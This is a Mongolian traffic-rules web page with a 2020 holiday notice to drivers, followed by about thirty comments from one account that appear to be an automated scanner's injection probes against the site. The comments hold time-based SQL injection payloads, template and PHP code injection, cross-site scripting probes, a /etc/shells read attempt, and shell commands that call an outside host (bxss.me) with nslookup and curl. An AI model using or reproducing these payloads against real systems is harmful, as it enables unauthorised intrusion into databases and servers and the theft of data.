• Замын хөдөлгөөний дүрэм
  • Холбоо барих

Жолооч та анхаар

2020-06-23
Жолооч та анхаар

2020 оны 06 сарын 24 бүх нийтийн амралтын өдөр тул дугаарын хязгаарлалт үйлчлэхгүй

zFPWdwPk 555
2023-03-02 Хариулах
zFPWdwPk 1����%2527%2522
2023-03-02 Хариулах
zFPWdwPk '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2023-03-02 Хариулах
zFPWdwPk MnpymTVr')) OR 918=(SELECT 918 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
zFPWdwPk jP04LBoy' OR 81=(SELECT 81 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
zFPWdwPk 1 waitfor delay '0:0:15' --
2023-03-02 Хариулах
zFPWdwPk if(now()=sysdate(),sleep(15),0)
2023-03-02 Хариулах
zFPWdwPk 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2023-03-02 Хариулах
zFPWdwPk 1*
2023-03-02 Хариулах
zFPWdwPk 1*
2023-03-02 Хариулах
zFPWdwPk 1*
2023-03-02 Хариулах
zFPWdwPk FXSwhStp
2023-03-02 Хариулах
zFPWdwPk "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
2023-03-02 Хариулах
zFPWdwPk dfb[[${98991*97996}]]xca
2023-03-02 Хариулах
zFPWdwPk dfb{{98991*97996}}xca
2023-03-02 Хариулах
zFPWdwPk bfg4757<s1﹥s2ʺs3ʹhjl4757
2023-03-02 Хариулах
zFPWdwPk bfgx4097��z1��z2a�bcxhjl4097
2023-03-02 Хариулах
zFPWdwPk http://xfs.bxss.me?gov.mn
2023-03-02 Хариулах
zFPWdwPk '||sleep(27*1000)*rkccry||'
2023-03-02 Хариулах
zFPWdwPk 932961
2023-03-02 Хариулах
zFPWdwPk "&&sleep(27*1000)*svgzds&&"
2023-03-02 Хариулах
zFPWdwPk '&&sleep(27*1000)*oafnbv&&'
2023-03-02 Хариулах
zFPWdwPk '"()
2023-03-02 Хариулах
zFPWdwPk ${@print(md5(31337))}\
2023-03-02 Хариулах
zFPWdwPk create
2023-03-02 Хариулах
zFPWdwPk ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
2023-03-02 Хариулах
zFPWdwPk http://bxss.me/t/fit.txt?.jpg
2023-03-02 Хариулах
zFPWdwPk '+'A'.concat(70-3).concat(22*4).concat(104).concat(83).concat(122).concat(69)+(require'socket' Socket.gethostbyname('hitxj'+'lpochwkedf47b.bxss.me.')[3].to_s)+'
2023-03-02 Хариулах
zFPWdwPk ;(nslookup -q=cname hitfowuvwodvc9a6aa.bxss.me||curl hitfowuvwodvc9a6aa.bxss.me)|(nslookup -q=cname hitfowuvwodvc9a6aa.bxss.me||curl hitfowuvwodvc9a6aa.bxss.me)&(nslookup -q=cname hitfowuvwodvc9a6aa.bxss.me||curl hitfowuvwodvc9a6aa.bxss.me)
2023-03-02 Хариулах
zFPWdwPk /etc/shells
2023-03-02 Хариулах